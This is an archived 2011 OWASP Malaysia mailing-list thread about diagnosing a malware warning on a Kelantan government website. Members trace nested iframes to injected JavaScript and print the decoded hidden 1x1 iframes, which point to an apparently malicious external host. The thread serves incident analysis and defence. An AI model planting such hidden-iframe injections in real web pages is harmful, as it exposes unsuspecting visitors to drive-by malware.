[Owasp-Malaysia] Malware Detected!

Sharuzzaman Ahmat Raslan sharuzzaman at gmail.com
Tue Feb 8 04:56:27 EST 2011


I can see 2 interesting apps/scripts:

1. mamp
2. /opt/analysis/js/js

care to share? hopefully it is open source ;)


On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor <
adnan.shukor at gmail.com> wrote:

> Here is my bash history:
>
> xanda:tmp adnan$ history
> <snip>
>  500  cd /tmp
>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>  502  wget http://www2.pkink.gov.my/indexsedc.php
>  503  nano indexsedc.php
>  504  wget http://www2.pkink.gov.my/indexsedc.php
>  505  mamp indexsedc.php.1
>  506  nano indexsedc.php.1
>  507  wget http://www2.pkink.gov.my/sedc.php
>  508  nano sedc.php
>  509  wget http://www2.pkink.gov.my/default.php
>  510  nano default.php
>  511  nano default.php
>  512  clear
> <I've remove tags and leave clean JavaScript inside>
>  513  mv default.php default.txt
>  514  /opt/analysis/js/js < default.txt
>  515  cat write.log
>  516  history
> xanda:tmp adnan$
>
> Below is the output of the cat:
> [output]
> xanda:tmp adnan$ cat write.log
> <iframe width="1" height="1"
> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> "></iframe>"<iframe
> width="1" height="1"
> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> "></iframe>"
> [/output]
>
>
> Hint: you might use modified version of spidermonkey to 'understand'
> the javascript
>
> Thanks
>
> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> > thanks for the info..
> > i will check all the file.
> >
> > how you found it?
> >
> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
> > <adnan.shukor at gmail.com> wrote:
> >>
> >> Here is the flow:
> >>
> >> 1) your indexsedc.php has an iframe to sedc.php
> >> 2) and your sedc.php has an iframe to default.php
> >> 3) and in default.php (look at the last 2 lines), javascript will
> >> actually create an iframe to
> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >>
> >> thanks :)
> >>
> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >> > can you point...
> >> > my index.htm or indexsedc.php or other file?
> >> >
> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
> >> > <adnan.shukor at gmail.com> wrote:
> >> >>
> >> >> you have iframe pointed to
> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >> >>
> >> >> which is not xss :)
> >> >>
> >> >> >From my personal point of view, its either caused by:
> >> >> 1) malware on pc which has been used for ftp/access to the server
> >> >> 2) compromised server
> >> >>
> >> >> you can send your access.log to cyber999 at cybersecurity.my or
> >> >> mycert at mycert.org.my for further analysis :)
> >> >>
> >> >> thanks
> >> >>
> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >> >> > I have check it.
> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com>
> >> >> > wrote:
> >> >> >>
> >> >> >> Hi Mohd Symsuri,
> >> >> >>
> >> >> >> Why dont you check on the reason why its being blocked, it might
> >> >> >> help.
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
> >> >> >>
> >> >> >> Regards,
> >> >> >> Kishur
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <
> msyamsuri at gmail.com>
> >> >> >> wrote:
> >> >> >>>
> >> >> >>> Assalamualikum and Good day for my fellow friends.
> >> >> >>> I need some advise.
> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for almost
> 4
> >> >> >>> days.
> >> >> >>> It said that we host malware on our server Malware Detected! (
> >> >> >>> Google
> >> >> >>> said that!!)
> >> >> >>> What i did is..
> >> >> >>> 1. Scan all the data and upload a new data
> >> >> >>> 2. Check the index.html or index.php
> >> >> >>> 3. Scan using web scanner using
> >> >> >>> http://www.avgthreatlabs.com/
> >> >> >>> http://www.virustotal.com
> >> >> >>> but still get block..
> >> >> >>> Googel said Suspected injected code
> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
> >> >> >>> NAME="confcontent"
> >> >> >>> scrolling=yes >
> >> >> >>> I have using this code for almost 2 years
> >> >> >>> What should i do now?
> >> >> >>>
> >> >> >>> --
> >> >> >>> best regard
> >> >> >>> syamsuri
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>> _______________________________________________
> >> >> >>> Owasp-Malaysia mailing list
> >> >> >>> Owasp-Malaysia at lists.owasp.org
> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >> >> >>>
> >> >> >>> OWASP Malaysia Wiki
> >> >> >>> http://www.owasp.org/index.php/Malaysia
> >> >> >>>
> >> >> >>> OWASP Malaysia Wiki Facebook
> >> >> >>>
> >> >> >>>
> >> >> >>>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >> >> >>
> >> >> >>
> >> >> >> _______________________________________________
> >> >> >> Owasp-Malaysia mailing list
> >> >> >> Owasp-Malaysia at lists.owasp.org
> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >> >> >>
> >> >> >> OWASP Malaysia Wiki
> >> >> >> http://www.owasp.org/index.php/Malaysia
> >> >> >>
> >> >> >> OWASP Malaysia Wiki Facebook
> >> >> >>
> >> >> >>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >> >> >
> >> >> >
> >> >> >
> >> >> > --
> >> >> > best regard
> >> >> > syamsuri
> >> >> >
> >> >> >
> >> >> >
> >> >> > _______________________________________________
> >> >> > Owasp-Malaysia mailing list
> >> >> > Owasp-Malaysia at lists.owasp.org
> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >> >> >
> >> >> > OWASP Malaysia Wiki
> >> >> > http://www.owasp.org/index.php/Malaysia
> >> >> >
> >> >> > OWASP Malaysia Wiki Facebook
> >> >> >
> >> >> >
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >> >> >
> >> >> _______________________________________________
> >> >> Owasp-Malaysia mailing list
> >> >> Owasp-Malaysia at lists.owasp.org
> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >> >>
> >> >> OWASP Malaysia Wiki
> >> >> http://www.owasp.org/index.php/Malaysia
> >> >>
> >> >> OWASP Malaysia Wiki Facebook
> >> >>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >> >
> >> >
> >> >
> >> > --
> >> > best regard
> >> > syamsuri
> >> >
> >> >
> >> >
> >> > _______________________________________________
> >> > Owasp-Malaysia mailing list
> >> > Owasp-Malaysia at lists.owasp.org
> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >> >
> >> > OWASP Malaysia Wiki
> >> > http://www.owasp.org/index.php/Malaysia
> >> >
> >> > OWASP Malaysia Wiki Facebook
> >> >
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >> >
> >> _______________________________________________
> >> Owasp-Malaysia mailing list
> >> Owasp-Malaysia at lists.owasp.org
> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>
> >> OWASP Malaysia Wiki
> >> http://www.owasp.org/index.php/Malaysia
> >>
> >> OWASP Malaysia Wiki Facebook
> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >
> >
> >
> > --
> > best regard
> > syamsuri
> >
> >
> >
> > _______________________________________________
> > Owasp-Malaysia mailing list
> > Owasp-Malaysia at lists.owasp.org
> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >
> > OWASP Malaysia Wiki
> > http://www.owasp.org/index.php/Malaysia
> >
> > OWASP Malaysia Wiki Facebook
> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>



-- 
Sharuzzaman Ahmat Raslan
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-malaysia/attachments/20110208/1ae2cdf5/attachment.html 


More information about the Owasp-Malaysia mailing list